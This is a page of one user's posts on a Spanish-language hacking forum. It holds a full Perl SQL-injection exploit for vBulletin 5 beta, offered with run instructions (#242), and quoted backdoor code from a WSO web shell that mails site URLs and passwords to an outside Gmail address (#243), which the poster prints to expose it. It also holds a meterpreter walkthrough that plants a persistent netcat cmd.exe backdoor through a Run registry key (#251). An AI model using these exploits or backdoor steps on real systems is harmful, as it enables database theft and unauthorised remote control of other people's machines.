Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - morodog

Páginas 1 ... 11 12 13 14 15 ... 20

#241

Dudas y pedidos generales / Re:Duda Sobre Servidores

Junio 09, 2013, 11:39:22 AM

Desde luego los blade se configuran por consola... Q yo sepa

#242

Bugs y Exploits / vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

Junio 09, 2013, 11:27:44 AM

Bajas Perl y guardas el código como .pl

Código: text

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: http://www.cyitsec.net             |
+===================================================+
";
  
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl http://WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
  
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;

Saludos

#243

Shells / Re:Bangladesh Cyber Army Shell (BCA Private Shell)

Junio 09, 2013, 11:13:18 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Aaaa laaaaaa, no había visto una web shell tan descaradamente backdoreada

linea 56:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==
Código: text
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
Y eso que solo revise hasta esa linea. ¿Que habrá mas abajo?

Saludos,

Juasss xD no hace falta leer más código xD

#244

Presentaciones y cumpleaños / Re:hola soy netco0m

Junio 09, 2013, 11:06:41 AM

W3lc0m3!!!

#245

Dudas y pedidos generales / Re:Duda Sobre Servidores

Junio 07, 2013, 10:22:42 PM

A ver sin teclado ni monitor , ni mouse, no puedes configurar nada lógicamente, un servidor puede ser cualquier ordenador q lleve instalado un S.0 dedicado a Server, y se configura de manera gráfica, salvo algunos q lo configuras por consola.

Hurga un poco por google con el tema servidores, mírate algún vídeo, y así tendrás una idea más clara.

Saludos.

#246

Dudas y pedidos generales / Re:Consulta en Redes

Junio 07, 2013, 10:14:15 PM

Hay unos PLC, q han salido nuevos, q tienen incorporado un amplificador de señal, y son muy efectivos, lo malo es su precio q es algo caro. Si quieres algo más barato te recomiendo poner una antena más gorda al router, para cubrir más!!

#247

Bugs y Exploits / Re:SQLi bypaseando el firewall y pasando el examen!

Junio 07, 2013, 10:12:11 PM

Buen material! Gracias!!

#248

Hacking ShowOff / Re:XSS en Movistar

Junio 06, 2013, 06:38:05 PM

Joder Proph3t estás en todo tío!!!

#249

Hacking ShowOff / Re:[XSS] mdzol.com

Junio 06, 2013, 06:37:26 PM

Los q no agradecen los reportes, no merecen ser tratados tan bien xD xD

#250

Hacking / Re:Creepy delatando tu geolocalización por las redes sociales

Junio 06, 2013, 09:05:48 AM

Seguro que es la herramienta preferida de los paparazzi, así saben donde estan sus famosetes a través de sus fotos colgadas en redes sociales.

xD

#251

Dudas y pedidos generales / Re:Subir backdoors a un cliente Windows

Junio 06, 2013, 09:04:11 AM

Te pasteo desde q se abre la sesión con meterpreter:

Meterpreter session 1 opened (192.168.0.2:1934 -> 192.168.0.3:4444)

meterpreter >
Ahora estamos dentro del P.C Remoto, Subamos el Archivo NetCat de nuestra P.C a la P.C Remota, con uso del comando upload. Miremos que opciones tiene esté comando.

meterpreter > upload
Usage: upload [options] [Ubicación Archivo Local] [Ubicación Archivo Remoto]

Uploads local files and directories to the remote machine.

OPTIONS:

-r Upload recursively.

meterpreter > Así:

meterpreter > upload C:\\Windows\\System32\\nc.exe C:\\Windows\\System32\\
uploading : C:\Windows\System32\nc.exe -> C:\Windows\System32\
uploaded : C:\Windows\System32\nc.exe -> C:\Windows\System32\\nc.exe
meterpreter > Despues crearemos una clave dentro del Registro de Windows con la siguiente ruta:

HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run

Asi:

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion \\Run -v Hacked -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter > Ahora solo nos queda reiniciar el P.C remoto con el comando Reboot. Asi:

meterpreter > reboot
Rebooting...
meterpreter >Y por ultimo conectarnos con el BackDoor que acabamos de dejar en la P.C Remota. Podemos usar el Mismos Metasploit o la Consola de Windows. En este caso usaremos el Metasploit. Así:

msf > connect 192.168.0.3 1234
Connected to 192.168.0.3:1234

fuente: shellsecurity

#252

Seguridad Wireless / Re:Asegurando nuestra red wireless

Junio 04, 2013, 07:48:00 PM

Buen aporte tío! Me gusta!

Saludos.

#253

Dudas y pedidos generales / Re:puerta trasera en windows 7

Junio 04, 2013, 07:42:58 PM

Rabulu en mi opinión, mucho por google no habrás buscado, porque si no, harías preguntas más concretas sobre el tema. Y la respuesta que te dio Sanko (aparte de buena), tiene mucho más contenido que " hackiar guindows" (que fue lo q creo q te sentó mal), te habló de los servicios que corren a través de un pc para guiarte, me pareció muy buena respuesta y vosotros en lugar de agracederlo os ponéis a decir tonterías.

Los colaboradores, admins , staff, etc... Estamos aquí para ayudar con lo que haga falta, y para compartir lo que sabemos, no para aguantar impertinencias.

Espero que consigas tu cometido Rabulu.

Saludos a todos!

#254